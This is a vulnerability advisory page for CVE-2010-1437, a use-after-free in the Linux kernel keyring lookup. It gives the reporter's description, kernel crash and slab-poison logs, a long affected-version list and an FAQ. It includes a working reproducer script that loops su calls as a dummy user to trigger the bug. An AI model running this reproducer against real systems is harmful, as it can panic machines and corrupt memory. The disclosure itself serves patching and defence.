CWE
476 362 416
Advisory Published
CVE Published
Updated

CVE-2010-1437: Null Pointer Dereference

First published: Fri Apr 23 2010(Updated: )

Description of problem: Reported by Toshiyuki Okajima. With linux-2.6.34-rc5, find_keyring_by_name() can gain the keyring which has been already freed. And then, its space (which is gained by find_keyring_by_name()) is broken by accessing the freed keyring as the available keyring: 1) If the space of the freed keyring is reallocated for other purpose (ie. filp SLUB), the data of the filp object may be destroyed by the user of the freed keyring. (SLUB configuration can share the freed space with other same-size slabs.) 2) If the slab space of the freed keyring is released into the system, the system panic may happen because accessing the space of the freed keyring causes the page-fault. Example: (we can easily confirm this problem if CONFIG_SLUB is "y".) [1] with CONFIG_SLUB_DEBUG_ON While we are executing my reproducer (which is attached), we can notice that the user of the freed keyring breaks its space: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - # ./reproducer & ... # dmesg ... ============================================================================= BUG key_jar: Poison overwritten ----------------------------------------------------------------------------- INFO: 0xffff880197a7e200-0xffff880197a7e200. First byte 0x6a instead of 0x6b INFO: Allocated in key_alloc+0x10b/0x35f age=25 cpu=1 pid=5086 INFO: Freed in key_cleanup+0xd0/0xd5 age=12 cpu=1 pid=10 INFO: Slab 0xffffea000592cb90 objects=16 used=2 fp=0xffff880197a7e200 flags=0x200000000000c3 INFO: Object 0xffff880197a7e200 @offset=512 fp=0xffff880197a7e300 Bytes b4 0xffff880197a7e1f0: 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a ZZZZZZZZZZZZZZZZ Object 0xffff880197a7e200: 6a 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b jkkkkkkkkkkkkkkk Object 0xffff880197a7e210: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk Object 0xffff880197a7e220: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk Object 0xffff880197a7e230: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk Object 0xffff880197a7e240: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk Object 0xffff880197a7e250: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk Object 0xffff880197a7e260: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk Object 0xffff880197a7e270: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk Object 0xffff880197a7e280: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk Object 0xffff880197a7e290: 6b 6b 6b 6b 6b 6b 6b a5 kkkkkkk� Redzone 0xffff880197a7e298: bb bb bb bb bb bb bb bb �������� Padding 0xffff880197a7e2d8: 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a ZZZZZZZZZZZZZZZZ Padding 0xffff880197a7e2e8: 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a ZZZZZZZZZZZZZZZZ Padding 0xffff880197a7e2f8: 5a 5a 5a 5a 5a 5a 5a 5a ZZZZZZZZ Pid: 5090, comm: su Not tainted 2.6.34-rc5-nofixed #1 Call Trace: [<ffffffff810e3e9c>] ? check_bytes_and_report+0xb5/0xe6 [<ffffffff81152994>] ? key_alloc+0x10b/0x35f [<ffffffff810e3f8f>] ? check_object+0xc2/0x1a4 [<ffffffff810e5c09>] ? __slab_alloc+0x2ff/0x3a6 [<ffffffff81152994>] ? key_alloc+0x10b/0x35f [<ffffffff81152780>] ? key_user_lookup+0x78/0x181 [<ffffffff81152994>] ? key_alloc+0x10b/0x35f [<ffffffff810e658a>] ? kmem_cache_alloc+0x75/0xe9 [<ffffffff81152994>] ? key_alloc+0x10b/0x35f [<ffffffff8115360a>] ? keyring_alloc+0x29/0x61 [<ffffffff81155897>] ? install_user_keyrings+0x99/0x168 [<ffffffff81155ae6>] ? lookup_user_key+0x180/0x30a [<ffffffff81153eaf>] ? keyctl_get_keyring_ID+0x15/0x38 [<ffffffff81008a02>] ? system_call_fastpath+0x16/0x1b FIX key_jar: Restoring 0xffff880197a7e200-0xffff880197a7e200=0x6b FIX key_jar: Marking all objects used ============================================================================= BUG key_jar: Poison overwritten ----------------------------------------------------------------------------- ... - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [2] without CONFIG_SLUB_DEBUG_ON While we are executing my reproducer (which is attached), we may find such the back-trace at the system panic: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - # ls -l /sys/kernel/slab total 0 drwxr-xr-x 2 root root 0 Apr 21 00:45 :at-0000016 ... lrwxrwxrwx 1 root root 0 Apr 21 00:45 cred_jar -> :t-0000192 ... lrwxrwxrwx 1 root root 0 Apr 21 00:45 filp -> :t-0000192 ... lrwxrwxrwx 1 root root 0 Apr 21 00:45 key_jar -> :t-0000192 ... lrwxrwxrwx 1 root root 0 Apr 21 00:45 kmalloc-192 -> :t-0000192 ... # ./reproducer.sh (PANIC) <1>BUG: unable to handle kernel NULL pointer dereference at 0000000000000001 <1>IP: [<ffffffff810e61a3>] kmem_cache_alloc+0x5b/0xe9 <4>PGD 6b2b4067 PUD 6a80d067 PMD 0 <0>Oops: 0000 [#1] SMP <0>last sysfs file: /sys/kernel/kexec_crash_loaded <4>CPU 1 <4>Modules linked in: nfsd lockd nfs_acl auth_rpcgss exportfs sunrpc autofs4 ipv6 ext4 jbd2 dm_mirror dm_region_hash dm_log dm_mul tipath uinput shpchp i2c_i801 ppdev parport_pc e752x_edac edac_core i2c_core tg3 iTCO_wdt iTCO_vendor_support parport pcspkr ext3 jbd mbcache ata_generic pata_acpi megaraid_mbox megaraid_mm ata_piix floppy dm_mod [last unloaded: scsi_wait_scan] <4>Pid: 31245, comm: su Not tainted 2.6.34-rc5-nofixed-nodebug #2 D2089/PRIMERGY <4>RIP: 0010:[<ffffffff810e61a3>] [<ffffffff810e61a3>] kmem_cache_alloc+0x5b/0xe9 <4>RSP: 0018:ffff88006af3bd98 EFLAGS: 00010002 <4>RAX: 0000000000000000 RBX: 0000000000000001 RCX: ffff88007d19900b <4>RDX: 0000000100000000 RSI: 00000000000080d0 RDI: ffffffff81828430 <4>RBP: ffffffff81828430 R08: ffff88000a293750 R09: 0000000000000000 <4>R10: 0000000000000001 R11: 0000000000100000 R12: 00000000000080d0 <4>R13: 00000000000080d0 R14: 0000000000000296 R15: ffffffff810f20ce <4>FS: 00007f97116bc700(0000) GS:ffff88000a280000(0000) knlGS:0000000000000000 <4>CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 <4>CR2: 0000000000000001 CR3: 000000006a91c000 CR4: 00000000000006e0 <4>DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 <4>DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 <4>Process su (pid: 31245, threadinfo ffff88006af3a000, task ffff8800374414c0) <0>Stack: <4> 0000000512e0958e 0000000000008000 ffff880037f8d180 0000000000000001 <4><0> 0000000000000000 0000000000008001 ffff88007d199000 ffffffff810f20ce <4><0> 0000000000008000 ffff88006af3be48 0000000000000024 ffffffff810face3 <0>Call Trace: <4> [<ffffffff810f20ce>] ? get_empty_filp+0x70/0x12f <4> [<ffffffff810face3>] ? do_filp_open+0x145/0x590 <4> [<ffffffff810ce208>] ? tlb_finish_mmu+0x2a/0x33 <4> [<ffffffff810ce43c>] ? unmap_region+0xd3/0xe2 <4> [<ffffffff810e4393>] ? virt_to_head_page+0x9/0x2d <4> [<ffffffff81103916>] ? alloc_fd+0x69/0x10e <4> [<ffffffff810ef4ed>] ? do_sys_open+0x56/0xfc <4> [<ffffffff81008a02>] ? system_call_fastpath+0x16/0x1b <0>Code: 0f 1f 44 00 00 49 89 c6 fa 66 0f 1f 44 00 00 65 4c 8b 04 25 60 e8 00 00 48 8b 45 00 49 01 c0 49 8b 18 48 85 db 74 0d 48 63 45 18 <48> 8b 04 03 49 89 00 eb 14 4c 89 f9 83 ca ff 44 89 e6 48 89 ef <1>RIP [<ffffffff810e61a3>] kmem_cache_alloc+0x5b/0xe9 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [reproducer.sh] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #!/bin/sh LOOP=100000 USER=dummy_user # add /bin/su -c "exit;" $USER || { /usr/sbin/adduser -m $USER; add=1; } for ((i=0; i<LOOP; i++)) do /bin/su -c "echo '$i' > /dev/null" $USER done # del (( add == 1 )) && /usr/sbin/userdel -r $USER exit - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - I created the patch which fixes this problem. (I attach it into the following mail. And I couldn't see the "Poison" lines of dmesg with the fixed kernel while I was executing my reproducer. So, this problem seems to be fixed by this patch.) This problem is serious because it may trigger the user data destructions.

Credit: secalert@redhat.com

Affected SoftwareAffected VersionHow to fix
Linux Kernel=2.6.32-git-6
Linux Kernel=2.6.27.12
Linux Kernel=2.6.20.6
Linux Kernel=2.6.32.5
Linux Kernel=2.6.28-rc4
Linux Kernel=2.6.28-git7
Linux Kernel=2.6.20.9
Linux Kernel=2.6.26-rc4
Linux Kernel=2.6.18-rc3
Linux Kernel=2.6.29-rc8-kk
Linux Kernel=2.6.11
Linux Kernel=2.6.23.4
Linux Kernel=2.6.22.15
Linux Kernel=2.6.16.16
Linux Kernel=2.6.18.7
Linux Kernel=2.6.17.12
Linux Kernel=2.6.16.39
Linux Kernel=2.6.31
Linux Kernel=2.6.29.3
Linux Kernel=2.6.21
Linux Kernel=2.6.16.9
Linux Kernel=2.6.31-rc4
Linux Kernel=2.6.17.9
Linux Kernel=2.6.32-rc1
Linux Kernel=2.6.31.9
Linux Kernel=2.6.11.2
Linux Kernel=2.6.5
Linux Kernel=2.6.32-rc5
Linux Kernel=2.6.15.3
Linux Kernel=2.6.11.10
Linux Kernel=2.6.24.7
Linux Kernel=2.6.1
Linux Kernel=2.6.16.43
Linux Kernel=2.6.16.6
Linux Kernel=2.6.31.3
Linux Kernel=2.6.16.8
Linux Kernel=2.6.20.13
Linux Kernel=2.6.33-rc6
Linux Kernel=2.6.22.4
Linux Kernel=2.6.27.34
Linux Kernel=2.6.14.7
Linux Kernel=2.6.18-rc2
Linux Kernel=2.6.13
Linux Kernel=2.6.17.2
Linux Kernel=2.6.13.3
Linux Kernel=2.6.23.13
Linux Kernel=2.6.11.8
Linux Kernel=2.6.24.2
Linux Kernel=2.6.18-rc5
Linux Kernel=2.6.26.5
Linux Kernel=2.6.30.10
Linux Kernel=2.6.16.34
Linux Kernel=2.6.25.20
Linux Kernel=2.6.31.12
Linux Kernel=2.6.27.37
Linux Kernel=2.6.18-rc4
Linux Kernel=2.6.22.21
Linux Kernel=2.6.23.7
Linux Kernel=2.6.30-rc2
Linux Kernel=2.6.17.8
Linux Kernel=2.6.14.4
Linux Kernel=2.6.14
Linux Kernel=2.6.16.31--rc3
Linux Kernel=2.6.25.5
Linux Kernel=2.6.17.4
Linux Kernel=2.6.16.18
Linux Kernel=2.6.17.14
Linux Kernel=2.6.10
Linux Kernel=2.6.23.8
Linux Kernel=2.6.27-rc6
Linux Kernel=2.6.32.9
Linux Kernel=2.6.16.45
Linux Kernel=2.6.22.12
Linux Kernel=2.6.25.18
Linux Kernel=2.6.14.3
Linux Kernel=2.6.34-rc2
Linux Kernel=2.6.29
Linux Kernel=2.6.24-rc3
Linux Kernel=2.6.18.3
Linux Kernel=2.6.16.37
Linux Kernel=2.6.30-rc3
Linux Kernel=2.6.11.6
Linux Kernel=2.6.16.48
Linux Kernel=2.6.11.11
Linux Kernel=2.6.16.13
Linux Kernel=2.6.27.10
Linux Kernel=2.6.27-rc5
Linux Kernel=2.6.3
Linux Kernel=2.6.31.4
Linux Kernel=2.6.32
Linux Kernel=2.6.21.6
Linux Kernel=2.6.26.6
Linux Kernel=2.6.22.1
Linux Kernel=2.6.16.4
Linux Kernel=2.6.23.16
Linux Kernel=2.6.31.6
Linux Kernel=2.6.17.3
Linux Kernel=2.6.31.10
Linux Kernel=2.6.27-rc3
Linux Kernel=2.6.24.1
Linux Kernel=2.6.32.3
Linux Kernel=2.6.20.5
Linux Kernel=2.6.22
Linux Kernel=2.6.28.4
Linux Kernel=2.6.4
Linux Kernel=2.6.26
Linux Kernel=2.6.16.15
Linux Kernel=2.6.27.20
Linux Kernel=2.6.15.6
Linux Kernel=2.6.24-rc5
Linux Kernel=2.6.26.3
Linux Kernel=2.6.20.16
Linux Kernel=2.6.34-rc1
Linux Kernel=2.6.15.1
Linux Kernel=2.6.11.5
Linux Kernel=2.6.28.2
Linux Kernel=2.6.25.9
Linux Kernel=2.6.19.3
Linux Kernel=2.6.27
Linux Kernel=2.6.19.4
Linux Kernel=2.6.25.13
Linux Kernel=2.6.28.5
Linux Kernel=2.6.19.1
Linux Kernel=2.6.18.4
Linux Kernel=2.6.33-rc1
Linux Kernel=2.6.16.1
Linux Kernel=2.6.18.1
Linux Kernel=2.6.20.21
Linux Kernel=2.6.31-rc1
Linux Kernel=2.6.27.33
Linux Kernel=2.6.23.1
Linux Kernel=2.6.2
Linux Kernel=2.6.14.5
Linux Kernel=2.6.13.2
Linux Kernel=2.6.17.5
Linux Kernel=2.6.24-rc4
Linux Kernel=2.6.32-rc6
Linux Kernel=2.6.18.5
Linux Kernel=2.6.21.1
Linux Kernel=2.6.16.32
Linux Kernel=2.6.13.5
Linux Kernel=2.6.16.57
Linux Kernel=2.6.16.49
Linux Kernel=2.6.25.3
Linux Kernel=2.6.27.36
Linux Kernel=2.6.17
Linux Kernel=2.6.24
Linux Kernel=2.6.31-rc6
Linux Kernel=2.6.31.1
Linux Kernel=2.6.19.2
Linux Kernel=2.6.26.2
Linux Kernel=2.6.21.4
Linux Kernel=2.6.16.11
Linux Kernel=2.6.20.17
Linux Kernel=2.6.16.14
Linux Kernel=2.6.33-rc2
Linux Kernel=2.6.20.12
Linux Kernel=2.6.16.25
Linux Kernel=2.6.16.21
Linux Kernel=2.6.16.33
Linux Kernel=2.6.30.7
Linux Kernel=2.6.8
Linux Kernel=2.6.16.28
Linux Kernel=2.6.17.10
Linux Kernel=2.6.21.5
Linux Kernel=2.6.25.15
Linux Kernel=2.6.14.1
Linux Kernel=2.6.28-rc5
Linux Kernel=2.6.23.15
Linux Kernel=2.6.16.23
Linux Kernel=2.6.33.1
Linux Kernel=2.6.29.4
Linux Kernel=2.6.12.5
Linux Kernel=2.6.15.7
Linux Kernel=2.6.20
Linux Kernel=2.6.23.10
Linux Kernel=2.6.22.7
Linux Kernel=2.6.27-rc7
Linux Kernel=2.6.16.3
Linux Kernel=2.6.27.8
Linux Kernel=2.6.31.7
Linux Kernel=2.6.24-rc1
Linux Kernel=2.6.28-rc1
Linux Kernel=2.6.26.1
Linux Kernel=2.6.25.19
Linux Kernel=2.6.20.20
Linux Kernel=2.6.16.36
Linux Kernel=2.6.30.8
Linux Kernel=2.6.14.6
Linux Kernel=2.6.12.1
Linux Kernel=2.6.27.9
Linux Kernel=2.6.11.9
Linux Kernel=2.6.16.46
Linux Kernel=2.6.17.1
Linux Kernel=2.6.20.8
Linux Kernel=2.6.30.9
Linux Kernel=2.6.20.15
Linux Kernel=2.6.22.18
Linux Kernel=2.6.0
Linux Kernel=2.6.25.8
Linux Kernel=2.6.16.54
Linux Kernel=2.6.32-rc4
Linux Kernel=2.6.13.4
Linux Kernel=2.6.22.20
Linux Kernel=2.6.23-rc2
Linux Kernel=2.6.20.18
Linux Kernel=2.6.23.9
Linux Kernel=2.6.22.6
Linux Kernel=2.6.23.3
Linux Kernel=2.6.18.8
Linux Kernel=2.6.22.3
Linux Kernel=2.6.12.2
Linux Kernel=2.6.16.31
Linux Kernel=2.6.30-rc5
Linux Kernel=2.6.16.26
Linux Kernel=2.6.29-rc2
Linux Kernel=2.6.16.62
Linux Kernel=2.6.18.2
Linux Kernel=2.6.28.8
Linux Kernel=2.6.31-rc5
Linux Kernel=2.6.16.29
Linux Kernel=2.6.29.1
Linux Kernel=2.6.23-rc1
Linux Kernel=2.6.24.4
Linux Kernel=2.6.28-rc7
Linux Kernel=2.6.27-rc8
Linux Kernel=2.6.25.16
Linux Kernel=2.6.16.31--rc5
Linux Kernel=2.6.22.9
Linux Kernel=2.6.25.17
Linux Kernel=2.6.20.11
Linux Kernel=2.6.32.6
Linux Kernel=2.6.19
Linux Kernel=2.6.20.3
Linux Kernel=2.6.16
Linux Kernel=2.6.30.4
Linux Kernel=2.6.28.3
Linux Kernel=2.6.22.13
Linux Kernel=2.6.19.7
Linux Kernel=2.6.21.3
Linux Kernel=2.6.24.5
Linux Kernel=2.6.16.51
Linux Kernel=2.6.15.2
Linux Kernel=2.6.20.19
Linux Kernel=2.6.16.22
Linux Kernel=2.6.22.17
Linux Kernel=2.6.33-rc7
Linux Kernel=2.6.16.58
Linux Kernel=2.6.28-rc6
Linux Kernel=2.6.16.40
Linux Kernel=2.6.32-rc7
Linux Kernel=2.6.27.35
Linux Kernel=2.6.16.47
Linux Kernel=2.6.16.42
Linux Kernel=2.6.33-rc8
Linux Kernel=2.6.27.22
Linux Kernel=2.6.23.14
Linux Kernel=2.6.17.11
Linux Kernel=2.6.16.10
Linux Kernel=2.6.12.4
Linux Kernel=2.6.16.41
Linux Kernel=2.6.16.52
Linux Kernel=2.6.11.3
Linux Kernel=2.6.20.10
Linux Kernel=2.6.33-rc3
Linux Kernel=2.6.16.24
Linux Kernel=2.6.31-rc7
Linux Kernel=2.6.25.10
Linux Kernel=2.6.22.11
Linux Kernel=2.6.16.55
Linux Kernel=2.6.16.31--rc2
Linux Kernel=2.6.23
Linux Kernel=2.6.12.3
Linux Kernel=2.6.22.10
Linux Kernel=2.6.27-rc2
Linux Kernel=2.6.29.6
Linux Kernel=2.6.27-rc1
Linux Kernel=2.6.23.17
Linux Kernel=2.6.27.5
Linux Kernel=2.6.29-rc2_git7
Linux Kernel=2.6.23.2
Linux Kernel=2.6.25.1
Linux Kernel=2.6.25.4
Linux Kernel=2.6.28.9
Linux Kernel=2.6.30.2
Linux Kernel=2.6.34-rc3
Linux Kernel=2.6.7
Linux Kernel=2.6.32.4
Linux Kernel<=2.6.34
Linux Kernel=2.6.21.7
Linux Kernel=2.6.30.6
Linux Kernel=2.6.16.30
Linux Kernel=2.6.21.2
Linux Kernel=2.6.15.4
Linux Kernel=2.6.27.7
Linux Kernel=2.6.16.59
Linux Kernel=2.6.30.1
Linux Kernel=2.6.16.38
Linux Kernel=2.6.24-rc2
Linux Kernel=2.6.16.17
Linux Kernel=2.6.26.8
Linux Kernel=2.6.20.2
Linux Kernel=2.6.22.22
Linux Kernel=2.6.28.6
Linux Kernel=2.6.16.12
Linux Kernel=2.6.29-rc1
Linux Kernel=2.6.16.31--rc1
Linux Kernel=2.6.31.5
Linux Kernel=2.6.16.27
Linux Kernel=2.6.16.53
Linux Kernel=2.6.28.7
Linux Kernel=2.6.18-rc7
Linux Kernel=2.6.12.6
Linux Kernel=2.6.31.11
Linux Kernel=2.6.31-rc8
Linux Kernel=2.6.17.7
Linux Kernel=2.6.20.1
Linux Kernel=2.6.11.7
Linux Kernel=2.6.27-rc4
Linux Kernel=2.6.16.2
Linux Kernel=2.6.24.6
Linux Kernel=2.6.28-rc3
Linux Kernel=2.6.31-rc3
Linux Kernel=2.6.18.6
Linux Kernel=2.6.15
Linux Kernel=2.6.16.44
Linux Kernel=2.6.23.12
Linux Kernel=2.6.16.35
Linux Kernel=2.6.19.6
Linux Kernel=2.6.16.50
Linux Kernel=2.6.25.11
Linux Kernel=2.6.33-rc4
Linux Kernel=2.6.18-rc6
Linux Kernel=2.6.29.2
Linux Kernel=2.6.34-rc4
Linux Kernel=2.6.23.5
Linux Kernel=2.6.22.8
Linux Kernel=2.6.14.2
Linux Kernel=2.6.16.61
Linux Kernel=2.6.32.7
Linux Kernel=2.6.32.8
Linux Kernel=2.6.31-rc2
Linux Kernel=2.6.19.5
Linux Kernel=2.6.18
Linux Kernel=2.6.32.2
Linux Kernel=2.6.27.24
Linux Kernel=2.6.20.4
Linux Kernel=2.6.17.6
Linux Kernel=2.6.23.6
Linux Kernel=2.6.16.7
Linux Kernel=2.6.32.1
Linux Kernel=2.6.17.13
Linux Kernel=2.6.16.60
Linux Kernel=2.6.22.2
Linux Kernel=2.6.8.1
Linux Kernel=2.6.27.11
Linux Kernel=2.6.16.56
Linux Kernel=2.6.28-rc2
Linux Kernel=2.6.31.8
Linux Kernel=2.6.22.19
Linux Kernel=2.6.24.3
Linux Kernel=2.6.31.2
Linux Kernel=2.6.27-rc9
Linux Kernel=2.6.30-rc6
Linux Kernel=2.6.25
Linux Kernel=2.6.32.10
Linux Kernel=2.6.20.14
Linux Kernel=2.6.25.2
Linux Kernel=2.6.32-rc8
Linux Kernel=2.6.22.5
Linux Kernel=2.6.32-rc3
Linux Kernel=2.6.25.7
Linux Kernel=2.6.30.5
Linux Kernel=2.6.25.14
Linux Kernel=2.6.20.7
Linux Kernel=2.6.28.1
Linux Kernel=2.6.30-rc1
Linux Kernel=2.6.16.5
Linux Kernel=2.6.30
Linux Kernel=2.6.11.4
Linux Kernel=2.6.26.4
Linux Kernel=2.6.25.12
Linux Kernel=2.6.16.19
Linux Kernel=2.6.27.6
Linux Kernel=2.6.26.7
Linux Kernel=2.6.29-git1
Linux Kernel=2.6.25.6
Linux Kernel=2.6.11.12
Linux Kernel=2.6.16.20
Linux Kernel=2.6.15.5
Linux Kernel=2.6.30-rc7-git6
Linux Kernel=2.6.28.10
Linux Kernel=2.6.22.16
Linux Kernel=2.6.11.1
Linux Kernel=2.6.30.3
Linux Kernel=2.6.33-rc5
Linux Kernel=2.6.16.31--rc4
Linux Kernel=2.6.18-rc1
Linux Kernel=2.6.9
Linux Kernel=2.6.27.23
Linux Kernel=2.6.13.1
Linux Kernel=2.6.23.11
Linux Kernel=2.6.28
Linux Kernel=2.6.29.5
Linux Kernel=2.6.22.14
Linux Kernel=2.6.6
Linux Kernel=2.6.12
Linux Kernel<2.6.34
Linux Kernel=2.6.34-rc5
openSUSE=11.1
SUSE Linux Enterprise Desktop with Beagle=11
SUSE Linux Enterprise High Availability=11
SUSE Linux Enterprise Server=11
Debian GNU/Linux=5.0

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Reference Links

Frequently Asked Questions

  • What is the severity of CVE-2010-1437?

    CVE-2010-1437 is classified as a high severity vulnerability due to its potential to allow unauthorized access to freed memory in the Linux kernel.

  • How do I fix CVE-2010-1437?

    To fix CVE-2010-1437, you should update to a patched version of the Linux kernel released by your distribution that addresses this vulnerability.

  • What versions of the Linux kernel are affected by CVE-2010-1437?

    CVE-2010-1437 affects multiple versions of the Linux kernel including 2.6.32 and earlier versions up to 2.6.34-rc5.

  • How can I identify if CVE-2010-1437 is present in my environment?

    You can identify CVE-2010-1437 by checking the version of the Linux kernel installed on your systems against the affected versions list.

  • What are the potential consequences of exploiting CVE-2010-1437?

    Exploiting CVE-2010-1437 could allow attackers to manipulate memory, potentially leading to privilege escalation or denial of service.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203